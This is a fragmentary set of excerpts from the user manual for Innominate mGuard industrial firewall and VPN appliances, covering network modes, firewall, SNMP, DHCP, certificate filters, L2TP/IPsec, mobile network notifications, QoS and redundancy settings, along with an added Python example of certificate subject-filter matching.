Configurable firewall for protection against unauthorized access: the dynamic packet filter inspects data packets using the source and destination address and blocks undesired data traffic.
Network card: mGuard pci SD, mGuard pcie SD, mGuard pci switch, mGuard delta.
mGuard rs4000/rs2000 3G: 3G mobile phone and, on the mGuard rs4000 3G, a dedicated DMZ port.

Basic properties of the mGuards:
- Stealth (auto, static, multi), router (static, DHCP client), PPPoE (for DSL), PPTP (for DSL) and modem
- VLAN
- DHCP server/relay on the internal and external network interfaces
- DNS cache on the internal network interface
- Administration via HTTPS and SSH
- Optional conversion of DSCP/TOS values (Quality of Service)
- Quality of Service (QoS)
- LLDP
- MAU management
- SNMP
- Stateful packet inspection
- Anti-spoofing
- IP filter
- L2 filter (only in stealth mode)
- NAT with FTP, IRC and PPTP support (only in router modes)
SIM1 and SIM2 light up green when the SIM card is active. If a PIN has not been entered, the LED flashes green.

Quality of the mobile network connection: the signal strength of the mobile network connection is indicated by three LEDs on the front of the mGuard rs4000/rs2000 3G. The LEDs function as a bar graph.

Table 6-1: LED indication of signal strength

LED 1 (lower)  LED 2 (middle)  LED 3 (upper)  Signal strength
Off            Off             Off            -113 dBm to -111 dBm: extremely poor to no network reception
On             Off             Off            -109 dBm to -89 dBm: adequate network reception
On             On              Off            -87 dBm to -67 dBm: good network reception
On             On              On             -65 dBm to -51 dBm: very good network reception

For stable data transmission we recommend at least good network reception. If the network reception is only adequate, only text messages can be sent and received.

In the case of the mGuard rs2000 3G the WAN is only available via the mobile network, as a WAN interface is not available. The mobile network function is preset. The mGuard rs2000 3G can only be operated in router mode.

Network menu: the status of the mobile network connection can be queried via SNMP. SNMP traps are sent in the following cases: incoming text message; incoming call; mobile network connection error. You can switch SNMP support on and off under Management >> SNMP. You can increase the amount of detail shown per entry in the log file
See also Network example diagram on page 25.

DMZ Networks: IP address via which the mGuard can be accessed by devices in the network connected to the DMZ port. The default settings in Router/PPPoE/PPTP/Modem mode are: IP address 192.168.3.1, netmask 255.255.255.0. You can also specify other addresses via which the mGuard can be accessed by devices in the networks connected to the DMZ port. For example, this can be useful if the network connected to the DMZ port is divided into subnetworks. Multiple devices in different subnetworks can then access the mGuard via different addresses.
IP: IP address via which the mGuard can be accessed via its DMZ port. Default: 192.168.3.1.
Netmask: the subnet mask of the network connected to the DMZ port. Default: 255.255.255.0.
Additional DMZ Routes: additional routes can be defined if further subnetworks are connected to the DMZ.
Network: specify the network in CIDR format (see CIDR (Classless Inter-Domain Routing) on page 24). Default: 192.168.3.0/24.
Gateway: the gateway via which this network can be accessed (see also Network example diagram on page 25). Default: 192.168.3.254.
Secondary External Interface: see Secondary External Interface on page 116.

Network menu, Router network mode, static router mode. Network Status (example from the web interface): Secondary external interface: not in use; Active default
Subject field: the entry is comprised of several attributes. These attributes are either expressed as an object identifier (e.g. 132.3.7.32.1) or, more commonly, as an abbreviation with a corresponding value. Example: CN=John Smith, O=Smith and Co, C=US.

If certain subject attributes must have very specific values for the browser to be accepted by the mGuard, then these must be specified accordingly. The values of the other, freely selectable attributes are entered using the asterisk wildcard (*). Example: CN=*, O=*, C=US (with or without spaces between attributes). In this example the attribute C=US must be entered in the certificate under Subject. Only then would the mGuard accept the certificate owner (Subject) as a communication partner. The other attributes in the certificates to be filtered can have any value.

If a subject filter is set, the number (but not the order) of the specified attributes must correspond to that of the certificates for which the filter is to be used. Please note that the filter is case-sensitive. Several filters can be set, and their sequence is irrelevant.

With HTTPS, the browser of the accessing user does not specify which user or administration rights it is using to log in. These access rights are assigned by setting filters here under Authorized for access as. This has the following result if there are several filters that let through a certa
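The matching rules stated above (same number of attributes, order irrelevant, asterisk as wildcard, case-sensitive comparison) are compact enough to implement and test directly. The following is an added example, not code from the manual or the mGuard firmware; the subjects and filters are constructed, and the helper that maps matching filters to roles only collects every matching filter, because the manual's rule for several matching filters is not reproduced here. Commas inside attribute values are not handled by the simple split used.

```python
# Added example (not mGuard code): matching an X.509 subject against the
# subject filters described in the manual.

def parse_subject(subject):
    """'CN=John Smith, O=Smith and Co, C=US'
    -> [('CN', 'John Smith'), ('O', 'Smith and Co'), ('C', 'US')].
    Spaces around the separators are optional. Names and values are kept
    exactly as written (the filter is case-sensitive). A comma inside a
    value is not supported by this simple split."""
    pairs = []
    for part in subject.split(","):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"attribute without value: {part!r}")
        name, value = part.split("=", 1)
        pairs.append((name.strip(), value.strip()))
    return pairs

def subject_matches_filter(subject, subject_filter):
    """True if the certificate subject satisfies the filter: the same number
    of attributes, order irrelevant, '*' matches any value, and every
    comparison is case-sensitive."""
    cert_attrs = parse_subject(subject)
    filter_attrs = parse_subject(subject_filter)
    if len(cert_attrs) != len(filter_attrs):
        return False
    remaining = list(cert_attrs)
    # Exact-value filter entries are consumed first, wildcards last, so a
    # wildcard cannot take the attribute that an exact entry needs
    # (e.g. filter 'OU=*, OU=Europe' against 'OU=Sales, OU=Europe').
    for name, wanted in sorted(filter_attrs, key=lambda attr: attr[1] == "*"):
        for index, (cert_name, cert_value) in enumerate(remaining):
            if cert_name == name and (wanted == "*" or cert_value == wanted):
                del remaining[index]
                break
        else:
            return False
    return True

def access_rights_for(subject, filters):
    """filters: list of (filter_string, role). Returns the roles of all
    filters that let the subject through, in list order."""
    return [role for flt, role in filters if subject_matches_filter(subject, flt)]

if __name__ == "__main__":
    subject = "CN=John Smith, O=Smith and Co, C=US"
    filters = [("CN=*, O=*, C=US", "admin"), ("CN=*, O=*, C=DE", "user")]
    print(access_rights_for(subject, filters))
```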
Management >> Service I/O >> Service I/O

The page shows, for each of the inputs CMD 1, CMD 2 and CMD 3: Switch type connected to the input, Current state, VPN connections controlled by this input, and Firewall rule records controlled by this input; and for each of the outputs ACK 1 and ACK 2: Monitor VPN connection or Firewall rule record. In the example shown, all three inputs are configured as Push button and display the state "Service input CMD n deactivated (off)".

Input CMD 1-3
Switch type connected to the input: Push button or On/Off switch. Select the type of switch connected.
Current state: displays the state of the connected switch.
VPN connections controlled by this input: when editing the VPN connection, the switch must be selected under Controlling service input under IPsec VPN >> Connections >> Edit >> General.
Firewall rule records controlled by this input

Output ACK 1-2
Monitor VPN connections or Firewall rule rec
4.3.3 Terms of License ..... 69
4.3.4 Management >> Update ..... 70
4.3.5 Overview ..... 70
4.3.6 ..... 71
Management >> Configuration Profiles ..... 74
4.4.1 Configuration Profiles ..... 74
Management >> SNMP ..... 79
4.5.1 Query ..... 79
4.5.2 Trap ..... 83
4.5.3 LLDP ..... 90
Management >> Central Management ..... 91
4.6.1 Configuration Pull ..... 91
Management >> Service I/O ..... 95
4.7.1 Service I/O ..... 96
4.7.2 Alarm output ..... 98
Management >> Restart ..... 100
4.8.1 ..... 100
5 Blade Control menu ..... 101
6 Network menu
The text is freely definable. You can use blocks from the events table, which can be inserted as wildcards in plain text (A and V) or in machine-readable form (a and v).

E-Mail Message: here you can enter the text that is sent as the e-mail body. The text is freely definable. You can use blocks from the events table, which can be inserted as wildcards in plain text (A and V) or in machine-readable form (a and v).

Table 4-1: Event table (event; machine-readable name; possible values)

State of the External Con... (ecs status): Not present; Present and in sync
Validity of the positional ... (gps valid)
Incoming call: telephone number
Incoming text message (gsm incoming_sms): telephone number and message of an incoming text message; unknown
Roaming state of the mobile network (gsm roaming)
Registration state to the mobile network (gsm service)
Currently selected SIM (gsm selected_sim): 1; 2
Mobile network fallback (gsm sim_fallback)
Mobile network probes (gsm network_probe): unknown
State of the Alarm output (signal contact close): Alarm output closed, OK; Alarm output is open, FAILURE (open)
Reason for activating the Alarm output (signal contact reason): No alarm; No network link on external interface (link_ext); No network link on internal interface (link_int); Power supply 1 out of order (psu); Power supply 2 out of order (psu2); Board temperature exceeding configured bounds (temp); Redu
1.2.5 WLAN via VPN

WLAN via VPN is used to connect two company buildings via a WLAN path protected using IPsec. The annex should also be able to use the Internet connection of the main building.

Figure 1-5: WLAN via VPN (main building 192.168.1.0/24, annex 192.168.2.0/24, WLAN path with 172.16.1.x addresses).

In this example the mGuard devices were set to router mode and a separate network with 172.16.1.x addresses was set up for the WLAN. To provide the annex with an Internet connection via the VPN, a default route is set up via the VPN.

Tunnel configuration in the annex:
Connection type: Tunnel (network <-> network)
Address of the local network: 192.168.2.0/24
Address of the remote network: 0.0.0.0/0

In the main building the corresponding counterpart is configured.

Tunnel configuration in the main building:
Connection type: Tunnel (network <-> network)
Local network: 0.0.0.0/0
Address of the remote network: 192.168.2.0/24

The default route of an mGuard usually uses the WAN port. However, in this case the Internet can be accessed via the LAN port
15.1.3 DNS Lookup

Support >> Tools >> DNS Lookup
Aim: to determine which host name belongs to a specific IP address, or which IP address belongs to a specific host name.
Procedure:
- Enter the IP address or host name in the Hostname field (e.g. myServer).
- Click on Lookup.
The response, which the mGuard determines according to its DNS configuration, is then returned.

15.1.4 IKE Ping

Support >> Tools >> IKE Ping
Aim: to determine whether the VPN software of a VPN gateway is able to establish a VPN connection, or whether a firewall prevents this, for example.
Procedure:
- Enter the name or IP address of the VPN gateway in the Hostname/IP Address field.
- Click on Ping.
- A corresponding message is then displayed.

15.2 Support >> Advanced

15.2.1 Hardware

This page (Support >> Advanced >> Hardware) lists various hardware properties of the mGuard: Hardware, CPU, CPU Family, CPU Stepping, CPU Clock Speed, System Temperature, System Uptime, User Space Memory, MAC 1 to MAC 4, Product Name
13.3.1 Ring Network Coupling ..... 320
14 Logging menu ..... 321
Logging >> Settings ..... 321
14.1.1 Settings ..... 321
Logging >> Browse local logs ..... 323
14.2.1 Log entry categories ..... 324
15 Support menu ..... 327
15.1 Support >> Tools ..... 327
15.1.1 Ping Check ..... 327
15.1.2 Traceroute ..... 327
15.1.3 DNS Lookup ..... 328
15.1.4 IKE Ping ..... 328
15.2 Support >> Advanced ..... 329
15.2.1 Hardware ..... 329
15.2.2 Snapshot ..... 329
16 Redundancy ..... 331
16.1 Firewall redundancy ..... 331
16.1.1 Components in firewall redundancy ..... 332
16.1.2 Interaction of the firewall redundancy components ..... 334
16.1.3 Firewall redundancy settings from previous versions ..... 334
16.1.4 Requirements for firewall redundancy
...able interfaces must be defined on this page under Allowed Networks in order to specify differentiated access and monitoring options on the mGuard.

Port for incoming SNMP connections (Default: 161): If this port number is changed, the new port number only applies for access via the External, External 2, VPN and Dial-in interface. Port number 161 still applies for internal access. The remote partner that implements remote access may have to specify the port number defined here during entry of the address.

SNMPv1/v2 Community: Read-Write Community: Enter the required login data in this field. Read-Only Community: Enter the required login data in this field.

Management >> SNMP >> Query

Allowed Networks: Lists the firewall rules that have been set up. These apply for incoming data packets of an SNMP access attempt. The rules specified here only take effect if Enable SNMPv3 access or Enable SNMPv1/v2 access is set to Yes. If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these rules are ignored.

From IP: Enter the address of the computer or network from which remote access is permitted or forbidden in this field. The following options are available
...acters (e.g. c) is not permitted. Example: Name exe refers to all files with the extension exe that are located in the Name directory and any subdirectories.

CIFS Integrity Monitoring >> CIFS Integrity Checking >> Set of Filename Patterns >> Edit

Include in check: Missing files trigger an alarm. Missing files are files that were present during initialization. An alarm is also triggered if additional files are present.
Include: the files are included in the check. Each file name is compared with the samples one after the other. The first hit determines whether the file is to be included in the integrity check. The file is not included if no hits are found.
Exclude: the files are excluded from the check.

9.3 CIFS Integrity Monitoring >> CIFS AV Scan Connector

In Stealth network mode without management IP address, the CIFS server for the anti-virus scan is not supported.

CIFS Antivirus Scan Connector: The CIFS Antivirus Scan Connector enables the mGuard to perform a virus scan on drives that are otherwise not externally accessible (e.g. production cells). The mGuard mirrors a drive externally in order to perform the virus scan. Additional anti-virus software is required for this procedure. Set the necessary read
...activate the L2TP server and make the following entries in the fields specified below: Type: Transport; Protocol: UDP; Local: all; Remote: all; PFS: No (see Perfect Forward Secrecy (PFS) on page 281).

Specifying a default route over the VPN: Address 0.0.0.0/0 specifies a default route over the VPN. With this address, all data traffic where no other tunnel or route exists is routed through this VPN tunnel. A default route over the VPN should only be specified for a single tunnel. In Stealth mode, a default route over the VPN cannot be used.

Option following installation of a VPN tunnel group license: If Address of the remote site's VPN gateway is specified as any, it is possible that there are many mGuard devices or many networks on the remote side. A very large address area is then specified in the Remote field for the local mGuard. A part of this address area is used on the remote mGuard devices for the network specified for each of them under Local. This is illustrated as follows; the entries in the Local and Remote fields for the local and remote mGuard devices could be made as follows:

Local mGuard: Local 10.0.0.0/8, Remote 10.0.0.0/8
Remote mGuard A: Local 10.1.7.0/24, Remote 10.0.0.0/8
Remote mGuard B: Local 10.3.9.0/24, Remote 10.0.0.0/8
Etc.

In this way, by configuring a single tunnel, you can establish connections for a number of peers. To use this option, the VPN tunnel group
...additional serial interface for the connected computer through the USB interface. The serial interface can be accessed on the computer using a terminal program. The mGuard smart provides a console through the serial interface, which can then be used in the terminal program. Windows requires a special driver. This can be directly downloaded from the mGuard; the relevant link is located on the right-hand side next to the Serial console via USB drop-down menu.

Off/On: When set to On, flow is controlled by means of RTS and CTS signals for PPP connections.

Default: 57600. Transmission speed for communication between the mGuard and modem via the serial connecting cable between both devices. This value should be set to the highest value supported by the modem. If the value is set lower than the maximum possible speed that the modem can reach on the telephone line, the telephone line will not be used to its full potential.

Yes/No: If the external modem is used for dial-in (see page 136), Yes means that the mGuard does not initialize the modem. The subsequently configured modem initialization sequence is not observed. Thus either a modem is connected which can answer calls itself (the default profile of the modem contains auto-answer), or a null modem cable to a computer can be used instead of the modem and the PPP protocol is used over this.

Specifies the initialization sequence that the mGuard sends to the connected mo
...address and subnet mask of the VLAN port. If the IP address should be within a VLAN, set this option to Yes.

VLAN ID: This option only applies if you set the Stealth configuration option to multiple clients. A VLAN ID between 1 and 4095. An explanation can be found under VLAN on page 364. If you want to delete entries from the list, please note that the first entry cannot be deleted. In multi-stealth mode, the external DHCP server of the mGuard cannot be used if a VLAN ID is assigned as the management IP.

Default gateway: The default gateway of the network where the mGuard is located. In Stealth modes autodetect and static, the mGuard adopts the default gateway of the computer connected to its LAN port. This does not apply if a management IP address is configured with the default gateway.

Alternative routes can be specified for data packets destined for the WAN that have been created by the mGuard. These include the packets from the following types of data traffic:
• Download of certificate revocation lists (CRLs)
• Download of a new configuration
• Communication with an NTP server for time synchronization
• Sending and receiving encrypted data packets from VPN connections
• Requests to DNS servers
• Syslog messages
• Download of firmware updates
• Download of configuration profiles from a central server (if configured)
• SNMP traps
N
...ailable. Therefore, after updating the system to a new minor release, press this button again until you receive the message that there is no newer update available. Install the next major release.

Note: It might be possible that there is no direct update from the currently installed version to the next major release available. Therefore execute the minor release update first and repeat this step until you receive the message that there is no newer minor release available. Then install the next major release.

(Screenshot: Update Servers list, showing the entry https w update innominate com.)

NOTE: Do not interrupt the power supply to the mGuard during the update process. Otherwise the device could be damaged and may have to be reactivated by the manufacturer.

Depending on the size of the update, the process may take several minutes. With mGuard firmware Version 5.0.0 or later, a license must be obtained for the relevant device before a major release upgrade (e.g. from Version 5.x.y to Version 6.x.y, or from Version 6.x.y to Version 7.x.y) can be installed. A message is displayed if a restart is required after completion of the update. The license must be installed on the device before updating the firmware (see Management >> Licensing on page 67 and Install on page 67). Minor release upgrades, i.e. within the same major version (e.g. within Version 7.x.y), can be installed with
...al Networks on page 123.

Secondary External Interface: See Secondary External Interface on page 116.

Network menu: Router network mode, PPPoE router mode

(Screenshot: Network >> Interfaces >> General. Network Status: External IP address 172.16.66.49; Active Default route 172.16.66.18; Used DNS servers 10.1.0.253. Network Mode: Router; Router Mode: PPPoE; PPPoE Login: user provider example n; PPPoE Password; PPPoE Service Name; Automatic Re-connect: No; Re-connect daily at 0 h 0 m.)

Network >> Interfaces >> General, Router network mode, PPPoE router mode

PPPoE (when Router is selected as the network mode and PPPoE is selected as the router mode): For access to the Internet, the Internet service provider (ISP) provides the user with a user name (login) and password. These are requested when you attempt to establish a connection to the Internet.

PPPoE Login: The user name (login) that is required by the Internet service provider (ISP) when you attempt to establish a connection to the Internet.

PPPoE Password: The password that is required by the Internet service provider when you attempt to establish a connection to the Internet.

Request PPPoE Service Name: When Yes is selected, the PPPoE client of the mGuard requests the service name specified below
...al tab page (see Network >> Interfaces on page 105 and on page 106). In this case, data traffic is not processed via the WAN port (Ethernet interface) but via this modem.

As a secondary external interface, if Secondary External Interface is activated and Built-in Modem is selected under Network >> Interfaces on the General tab page (see Network >> Interfaces on page 105 and on page 106). In this case, data traffic is also processed via the serial interface.

For the PPP dial-in option, see Options for using the serial interface on page 139. Please note that the serial interface of the device also provides similar options for use (see above). Therefore, on an mGuard industrial rs with a built-in modem, normal data traffic can be routed via a modem connection (Modem network mode), and a second modem connection can be used simultaneously for the PPP dial-in option, for example.

For the mGuard industrial rs with built-in modem:

(Screenshot: External Modem: Hardware handshake; Baudrate: 57600; Handle modem transparently for dial-in only; Modem init string: d dATH OK. Built-in Modem (analog). Additionally for the mGuard industrial rs with built-in modem and built-in speaker: Speaker volume; Speaker control (built-in speaker): Speaker is on during call establishment but off when receiving carr)
...algorithm must be replaced by SHA-1.

Allows VPN connections to the mGuard to be established using the IPsec/L2TP protocol. In doing so, the L2TP protocol is driven using an IPsec transport connection in order to establish a tunnel connection to a Point-to-Point Protocol (PPP). Clients are automatically assigned IP addresses by the PPP.

In order to use IPsec/L2TP, the L2TP server must be activated and one or more IPsec connections with the following properties must be defined: Type: Transport; Protocol: UDP; Local: all; Remote: all; PFS: No (see IPsec VPN >> Connections >> Edit >> General on page 257, and IPsec VPN >> Connections >> Edit >> IKE Options, Perfect Forward Secrecy (PFS) on page 281).

10.3.1 L2TP Server

(Screenshot: IPsec VPN >> L2TP over IPsec. L2TP Server Settings: Start L2TP Server for IPsec/L2TP: Yes; Local IP for L2TP connections: 10.106.106.1; Remote IP range start: 10.106.106.2; IP range end: 10.106.106.254. Please note: These settings don't apply to the Stealth mode. Status: VPN Name, Index, Remote Gateway, Local IP Address, Remote IP Address.)

IPsec VPN >> L2TP over IPsec >> L2TP Server Settings

Start L2TP Server for IPsec/L2TP: If you want to enable IPsec/L2TP connections, set this option to Yes. It is then possible to establish L2TP connections to the mGuard via IPsec, which dynamically assign IP addresses to the clients with
...ample of imported remote certificates:

(Screenshot: Authentication >> Certificates >> Remote Certificates, Trusted remote Certificates. Subject: CN=Battaglia Mauro, L=KS, OU=Spezialwartung, O=Beispiel Lieferant, C=DE. Subject Alternative Names. Issuer: CN=SSH SubCA 01, O=Secure Access GmbH, C=DE. Validity: From Mar 20 19:37:46 2007 GMT to Mar 20 19:37:46 2010 GMT. Fingerprint: MD5 52:E5:2D:BE:00:88:0B:F8:39:1E:BF:92:9F:2E:B9:7C; SHA1 68:52:FB:FF:E2:0D:3A:7A:69:D8:B3:D6:CB:7E:82:4E:CD:DE:9A:CE. Shortname: Battaglia Mauro. Upload Certificate: Filename, Browse, Import. Download Certificate.)

Authentication >> Certificates >> Remote Certificates

Trusted remote Certificates: Displays the currently imported remote certificates.

Importing a new certificate. Requirement: The file (file name extension .cer, .pem or .crt) is saved on the connected computer. Proceed as follows:
• Click on Browse to select the file.
• Click on Import. Once imported, the loaded certificate appears under Certificate.
• Remember to save the imported certificate along with the other entries by clicking on the Apply button.

Shortname: When importing a remote certificate, the CN attribute from the certificate subject field is suggested as the short name here, providing the Shortname field is empty at this point. This name can be adopted or another name can b
...anagement >> Web Settings (Access menu), VPN connections (IPsec VPN >> Connections menu), the certificates imported on the mGuard are provided in a selection list. The certificates are displayed under the short name specified for each individual certificate on this page. For this reason, name assignment is mandatory.

Creating a certificate copy: You can create a copy of the imported machine certificate, e.g. for the partner, in order to authenticate the mGuard. This copy does not contain the private key and can therefore be made public at any time. To do this, proceed as follows:
• Click on Current Certificate File next to the Download Certificate row for the relevant machine certificate.
• Enter the desired information in the dialog box that opens.

7.4.3 CA Certificates

CA certificates are certificates issued by a certification authority (CA). CA certificates are used to check whether the certificates shown by partners are authentic. The checking process is as follows: the certificate issuer (CA) is specified as the issuer in the certificate transmitted by the partner. These details can be verified by the same issuer using the local CA certificate. For a more detailed explanation, see Authentication >> Certificates on page 190.

Example of imported CA certificates:

(Screenshot: Authentication, Certificates, Certifica
...and intended use of the products in your specific application, in particular with regard to observing the applicable standards and regulations. All information made available in the technical data is supplied without any accompanying guarantee, whether expressly mentioned, implied or tacitly assumed. In general, the provisions of the current standard Terms and Conditions of Innominate apply exclusively, in particular as concerns any warranty liability. This user manual, including all illustrations contained herein, is copyright protected. Any changes to the contents or the publication of extracts of this document are prohibited. Innominate reserves the right to register its own intellectual property rights for the product identifications of Innominate products that are used here. Registration of such intellectual property rights by third parties is prohibited. Other product identifications may be afforded legal protection even where they may not be indicated as such. Innominate and mGuard are registered trade names of Innominate Security Technologies AG. mGuard technology is protected by patents 10138865 and 10305413 granted by the German Patent and Trademark Office, and by US patents 7,430,759 and 8,146,144. Further patents are pending. Published by Innominate Security Technologies AG, Rudower Chaussee 13, 12489 Berlin, Germany. Phone: +49 (0)30 92 10 28 0. contact@innominate.com, www.innominate.com. 27 January
...any stands for all Ethernet protocols. Additional protocols can be specified in name or hexadecimal format, for example IPv4 or 0800, ARP or 0806.

Action: Accept means that the data packets may pass through. Drop means that the data packets are not permitted to pass through (they are dropped).

Comment: Freely selectable comment for this rule.

Outgoing: The explanation provided under Incoming also applies to Outgoing.

mGuard rs4000/rs2000 3G, mGuard rs4000/rs2000, mGuard centerport, mGuard industrial rs, mGuard blade, mGuard delta, EAGLE mGuard

8.1.6 Advanced

The following settings affect the basic behavior of the firewall.

(Screenshot: Network Security >> Packet Filter >> Advanced. Consistency checks: Maximum size of ping packets (ICMP Echo Request); Enable TCP/UDP/ICMP consistency checks: Yes; Allow TCP keepalive packets without TCP flags: No. Network Modes Router/PPTP/PPPoE: ICMP via primary external interface for the mGuard: Drop; ICMP via secondary external interface for the mGuard: Drop; ICMP via DMZ interface for the mGuard: Drop. Please note: Enabling SNMP access automatically accepts incoming ICMP packets. Stealth Mode: Allow forwarding of GVRP frames: No; Allow forwarding of STP frames: No; Allow forwarding of DHCP frames: Yes. Connection Tracking)
...are displayed below as follows:

(Screenshot: Network >> DHCP >> Internal DHCP. DHCP Mode: DHCP mode: Server. DHCP Server Options: Enable dynamic IP address pool: Yes; DHCP lease time: 14400; DHCP range start: 192.168.1.100; DHCP range end: 192.168.1.199; Local netmask: 255.255.255.0; Broadcast address: 192.168.1.255; Default gateway: 192.168.1.1; DNS server: 10.0.0.254; WINS server: 192.168.1.2. Static Mapping: Client MAC Address, Client IP Address. Current Leases: mac, ip, expiration.)

Network >> DHCP >> Internal DHCP

DHCP Server Options: Enable dynamic IP address pool, DHCP lease time, DHCP range start, DHCP range end, Local netmask, Broadcast address, Default gateway, DNS server, WINS server.

Enable dynamic IP address pool: Set this option to Yes if you want to use the IP address pool specified under DHCP range start and DHCP range end (see below). Set this option to No if only static assignments should be made using the MAC addresses (see below).

With enabled dynamic IP address pool: When the DHCP server and the dynamic IP address pool have been activated, you can specify the network parameters to be used by the computer.

DHCP range start/end: The start and end of the address area from which the DHCP server of the mGuard should assign IP addresses to locally connected computers.

Time in seco
...are three times as long, i.e. 168 bits in length. Still considered to be secure today, 3DES is included in the IPsec standard, for example.

AES: Advanced Encryption Standard, developed by NIST (National Institute of Standards and Technology) over the course of many years of cooperation with industry. This symmetrical encryption standard has been developed to replace the earlier DES standard. AES specifies three different key lengths: 128, 192 and 256 bits. In 1997 NIST started the AES initiative and published its conditions for the algorithm. From the many proposed encryption algorithms, NIST selected a total of five algorithms for closer examination: MARS, RC6, Rijndael, Serpent and Twofish. In October 2000 the Rijndael algorithm was adopted as the encryption algorithm.

How trustworthy is a certificate and the issuing CA (certification authority)? (See X.509 certificate on page 363.) A CA certificate can be consulted in order to check a certificate bearing this CA's signature. This check only makes sense if there is little doubt that the CA certificate originates from an authentic source, i.e. is authentic. In the event of doubt, the CA certificate itself can be checked. If, as is usually the case, the certificate is a sub-CA certificate, i.e. a CA certificate issued by a sub-certification authority, then the CA certificate of the superordinate CA can be used to check the CA certificate of the subordinate instance. If
...ares the IP addresses stated in the IP packets with the entries in the routing table in order to determine the correct route. If a router is connected to the computer and its internal IP address (i.e. the IP address of the router's LAN port) has been relayed to the operating system as the default gateway in the network card's TCP/IP configuration, then this IP address is used as the destination if all other IP addresses in the routing table are not suitable. In this case, the IP address of the router specifies the default route, because all IP packets whose IP address has no counterpart in the routing table (i.e. cannot find a route) are directed to this gateway.

Glossary

DynDNS provider: Also known as Dynamic DNS provider.

IP address: Every computer connected to the Internet has an IP address (IP = Internet Protocol). If the computer accesses the Internet via a dial-up modem, ISDN or ADSL, its Internet service provider will assign it a dynamic IP address. In other words, the address changes for each online session. Even if a computer is online 24 hours a day without interruption (e.g. flat rate), the IP address will change during the session. If this computer needs to be accessible via the Internet, it must have an address that is known to the remote partner. This is the only way to establish a connection to the computer. However, if the address of the computer changes cons
...ary target is set (see Secondary targets for ICMP echo requests on page 313).

Internal Interface: Summarized result, Ethernet link status, Number of check intervals, Check interval, Timeout per interval and set of targets, Results of the last 16 intervals (youngest first): See External Interface for each of these.

13.3 Ring Network Coupling

The ring network coupling function is not supported by mGuard centerport.

Ring network coupling with restrictions: mGuard delta (the internal side switch ports cannot be switched off); mGuard pci (in driver mode the internal network interface cannot be switched off; however, this is possible in power-over-PCI mode).

13.3.1 Ring Network Coupling

Redundancy >> Firewall Redundancy >> Ring Network Coupling

Ring Network Coupling Settings

Enable Ring Network Coupling/Dual Homing: Yes/No. When activated, the status of the Ethernet connection is transmitted from one port to another in Stealth mode. This means that interruptions in the network can be traced easily.

Redundancy Port: Internal/External. Internal: if the connection is lost established on th
Please note: The placeholders %a, %A, %w, %W in the message will be replaced by:
%a: The configured event in machine-readable format.
%A: The configured event in human-readable format, translated to the configured language.
%w: The current value of the event in machine-readable format.
%W: The current value of the event in human-readable format, translated to the configured language.

(Screenshot: Incoming: Last incoming text message; Current incoming voice call. Send text message: Recipient number; Message. Outgoing.)

Network >> Mobile Network >> Text message Notifications

Text message Notifications: Any text message recipient can be linked to predefined events and a freely definable message. The list is processed from top to bottom.

Text message recipient number: Defines a recipient number for the text message.

Event: When the selected event occurs, the linked recipient number is selected and the event is sent to them as a text message. A text message can also be stored and sent. A complete list of all events can be found at Event table on page 53.

Network >> Mobile Network >> Text message Notifications >> Incoming

Selector: A configured VPN connection can be selected here, which is monitored via text message.

Text message content: Here you can enter the text that is sent as a text message (160 characters maximum, 7-bit ASCII) n
...attack is the repetition of previously sent encrypted data packets using copies which have been saved by the attacker. The data traffic is protected by sequential numbers. Independent sequential numbers are used for each direction in an IPsec channel. The mGuard drops ESP packets which have the same sequential number as a packet that has already been decrypted for a specific IPsec channel by the mGuard. This mechanism is known as the IPsec replay window.

The IPsec replay window is only replicated sporadically during state synchronization, as it is very resource-intensive. Therefore the active mGuard may have an obsolete IPsec replay window following a fail-over. An attack is then possible until the real VPN partner has sent the next ESP packet for the corresponding IPsec SA, or until the IPsec SA has been renewed.

To avoid having an insufficient sequential number for the outgoing IPsec SA, VPN redundancy adds a constant value to the sequential number for each outgoing IPsec SA before the mGuard becomes active. This value is calculated so that it corresponds to the maximum number of data packets which can be sent through the VPN channel during the maximum fail-over switching time. In the worst case (1 Gigabit Ethernet and a switching time of 10 seconds) this is 0.5 % of an IPsec sequence. At best this is only one per thousand. Adding a constant value to the sequential number prevents the accidental reuse of a sequence number already used
(Screenshot: Default Queue, Default Rules. Columns: Protocol, From IP, To IP, Port, Current TOS/DSCP, New TOS/DSCP, Queue.
1: All; 0.0.0.0/0; 0.0.0.0/0; any; TOS Minimize Delay; Unchanged; Urgent
2: All; 0.0.0.0/0; 0.0.0.0/0; any; TOS Maximize Reliability; Unchanged; Important
3: All; 0.0.0.0/0; 0.0.0.0/0; any; TOS Minimize Cost; Unchanged; Low Priority)

All of the tab pages listed above for Egress Rules (for the Internal, External, External 2 and Dial-in interfaces, and for VPN connections routed via these interfaces) have the same setting options. In all cases the settings relate to the data that is sent externally into the network from the relevant mGuard interface.

QoS menu >> Egress Rules >> Internal/External/External 2/Dial-in
QoS menu >> Egress Rules VPN >> VPN via Internal/VPN via External/VPN via External 2/VPN via Dial-in

Default: Default Queue: Name of the egress queue (user-defined). The names of the queues are displayed as listed or specified under Egress Queues on the Internal, External, VPN via External tab pages. The following default names are defined: Default, Urgent, Important, Low Priority. Traffic that is not assigned to a specific egress queue under Rules remains in the default queue.

Rules (Protocol, From IP, From Port, To IP, To Port): You can specify which egress queue should be us
...ay address on these computers. NAT should be activated if the mGuard is operated in Router mode and establishes the connection to the Internet (see Network >> NAT on page 152). Only then can the computers in the connected local network access the Internet via the mGuard. If NAT is not activated, it is possible that only VPN connections can be used. In Router network mode, a secondary external interface can also be configured (see Secondary External Interface on page 116).

There are several Router modes, depending on the Internet connection: static, DHCP, PPPoE, PPTP, Modem, Built-in Modem, Built-in mobile network modem.

Router Mode static: The IP address is fixed.

Router Mode DHCP: The IP address is assigned via DHCP.

Router Mode PPPoE: PPPoE mode corresponds to Router mode with DHCP, but with one difference: the PPPoE protocol, which is used by many DSL modems for DSL Internet access, is used to connect to the external network (Internet, WAN). The external IP address which the mGuard uses for access from remote partners is specified by the provider. If the mGuard is operated in PPPoE mode, the mGuard must be set as the default gateway on the locally connected computers. This means that the IP address of the mGuard LAN port must be specified as the default gateway address on these computers. If the mGuard is opera
...be accessed via IP address 10.0.0.8 in the external network.

(Figure: 1:1 NAT example. A device with IP address 192.168.0.8 in the local network 192.168.0.0/24 is reachable as 10.0.0.8 in the external network 10.0.0.0/24.)

